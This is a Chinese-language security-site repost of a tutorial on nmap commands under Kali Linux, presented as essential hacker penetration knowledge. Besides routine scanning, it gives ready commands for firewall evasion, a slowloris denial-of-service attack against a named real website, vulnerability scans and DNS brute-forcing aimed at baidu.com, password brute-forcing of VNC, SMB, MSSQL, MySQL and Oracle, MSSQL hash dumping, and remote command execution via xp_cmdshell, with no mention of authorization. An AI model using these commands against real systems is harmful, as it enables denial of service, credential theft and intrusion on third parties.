安基网 首页 安全 渗透测试 查看内容

信息收集:kalilinux下nmap的常用命令,黑客安全渗透必备知识

2019-7-23 16:18| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全安装: sudo apt install nmap -ynmap主机发现扫码Ping扫描: 批量扫描一个网段的主机存活数. nmap -s ...

前言:

nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全

安装:

 sudo apt install nmap -y

nmap主机发现扫码

Ping扫描: 批量扫描一个网段的主机存活数.

 nmap -sP 192.168.1.0/24

nmap扫描结果

跳过Ping: 有些主机关闭了ping检测或者开启了防火墙,当我们ping的时候ping不通,所以可以使用-P0跳过ping的探测,加快扫描速度.

nmap -P0 192.168.1.7

计算网段主机IP: 仅列出指定网段上的每台主机,不发任何报文到目标主机.

 nmap -sL 192.168.1.0/24

扫描IP地址范围: 可以指定一个IP地址范围

nmap -sP 192.168.1.1-10

探测开放端口(SYN): 探测目标主机开放的端口,可指定一个以逗号分隔的端口列表(如-PS22,443,80).

nmap -PS22,80,443 192.168.1.7

探测开放端口(UDP): 探测目标主机开放的端口,可指定一个以逗号分隔的端口列表(如-PS22,443,80).

nmap -PU 192.168.1.8

SYN扫描: 使用SYN半开放扫描

 nmap -sS 192.168.1.8

TCP扫描: 扫描开放了TCP端口的设备.

nmap -sT 192.168.1.7

UDP扫描: 扫描开放了UDP端口的设备.

nmap -sU 192.168.1.7

协议探测: 探测目标主机支持哪些IP协议

nmap -sO 192.168.1.7

探测目标系统: 扫描探测目标主机操作系统

nmap -O 192.168.1.7

探测服务版本: 用于扫描目标主机服务版本号.

nmap -sV 192.168.1.7

扫描多台主机: 一次性扫描多台目标主机.

nmap 192.168.1.2 192.168.1.7 192.168.1.8

绕过防火墙: 在扫描时通过使用-f参数以及使用--mtu 4/8/16使用分片、指定数据包的MTU,来绕过防火墙.

nmap -f 192.168.1.8

Nmap 使用扫描脚本

Nmap不仅用于端口扫描,服务检测,其还具有强大的脚本功能,利用Nmap Script可以快速探测服务器,一般情况下,常用的扫描脚本会放在/usr/share/nmap/script目录下,并且脚本扩招名为*.nse后缀的,接下来将介绍最常用的扫描脚本.

扫描WEB敏感目录: 通过使用--script=http-enum.nse可以扫描网站的敏感目录.

[root@localhost ~]# nmap -p 80 --script=http-enum.nse www..com

可以看到admin后台已经扫描出来了~~~

默认脚本扫描: 脚本扫描,主要是搜集各种应用服务的信息,收集到后可再针对具体服务进行攻击.

nmap --script=default www.baidu.com

检测常见漏洞: 通过使用--script=luln,可以扫描网站的常见漏洞,以及网页的目录结构.

nmap --script=vuln www.baidu.com

内网服务探测: 通过使用--script=broadcast,可以实现在局域网内探查更多服务开启状况.

nmap -n -p445 --script=broadcast 127.0.0.1

进行WhoIS查询: 通过使用--script whois模块,可以查询网站的简单信息.

nmap --script whois www.baidu.com

详细WhoIS解析: 利用第三方的数据库或资源,查询详细的WhoIS解析情况.

nmap --script external www.baidu.com

发现内网网关: 通过使用--script=broadcast-netbios-master-browser可以发现内网网关的地址.

nmap --script=broadcast-netbios-master-browser 192.168.1.1

发现WEB中Robots文件: 通过使用--script=http-robots.txt.nse可以检测到robots文件内容.

nmap --script=http-robots.txt.nse www.baidu.com

检查WEB服务器时间: 检查web服务器的当前时间.

nmap -p 443 --script http-date.nse www.baidu.com

执行DOS攻击: dos攻击,对于处理能力较小的站点还挺好用的.

nmap --script http-slowloris --max-parallelism 1000 www.mkdirs.com

检查DNS子域: 检查目标ns服务器是否允许传送,如果能,直接把子域拖出来就好了.

 nmap -p 53 --script dns-zone-transfer.nse -v www.baidu.com

查询WEB旁站: 旁站查询,ip2hosts接口该接口似乎早已停用,如果想继续用,可自行到脚本里把接口部分的代码改掉.

 nmap -p80 --script hostmap-ip2hosts.nse www.baidu.com

暴力破解DNS记录: 这里以破解百度的域名为例子,由于内容较多这里简化显示.

nmap --script=dns-brute.nse www.baidu.com

内网VNC扫描: 通过使用脚本,检查VNC版本等一些敏感信息.

[root@localhost ~]# nmap --script=realvnc-auth-bypass 127.0.0.1 #检查VNC版本
[root@localhost ~]# nmap --script=vnc-auth 127.0.0.1 #检查VNC认证方式
[root@localhost ~]# nmap --script=vnc-info 127.0.0.1 #获取VNC信息
[root@localhost ~]# nmap --script=vnc-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #暴力破解VNC密码

内网SMB扫描: 检查局域网中的Samba服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap --script=smb-brute.nse 127.0.0.1 #简单尝试破解SMB服务
[root@localhost ~]# nmap --script=smb-check-vulns.nse --script-args=unsafe=1 127.0.0.1 #SMB已知几个严重漏
[root@localhost ~]# nmap --script=smb-brute.nse --script-args=userdb=/user.txt,passdb=/pass.txt 127.0.0.1 #通过传递字段文件,进行暴力破解
[root@localhost ~]# nmap -p445 -n --script=smb-psexec --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查询主机一些敏感信息:nmap_service
[root@localhost ~]# nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看会话
[root@localhost ~]# nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=admin,smbpass=1233 127.0.0.1 #查看系统信息

MSSQL扫描: 检查局域网中的SQL Server服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MSSQL密码
[root@localhost ~]# nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 127.0.0.1 #dumphash值
[root@localhost ~]# nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4 xp_cmdshell #执行命令

MYSQL扫描: 检查局域网中的MySQL服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap -p3306 --script=mysql-empty-password.nse 127.0.0.1 #扫描root空口令
[root@localhost ~]# nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 127.0.0.1 #列出所有用户
[root@localhost ~]# nmap -p3306 --script=mysql-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #暴力破解MYSQL口令

Oracle扫描: 检查局域网中的Oracle服务器,以及对服务器的暴力破解.

[root@localhost ~]# nmap --script=oracle-sid-brute -p 1521-1560 127.0.0.1 #oracle sid扫描
[root@localhost ~]# nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 127.0.0.1 #oracle弱口令破解

nmap的用法还有很多,这里就不一一介绍了。。。。

喜欢黑客技术的话可以关注我,每天都会有相应的教程发布~

谢谢大家~



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6716402609562845703/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部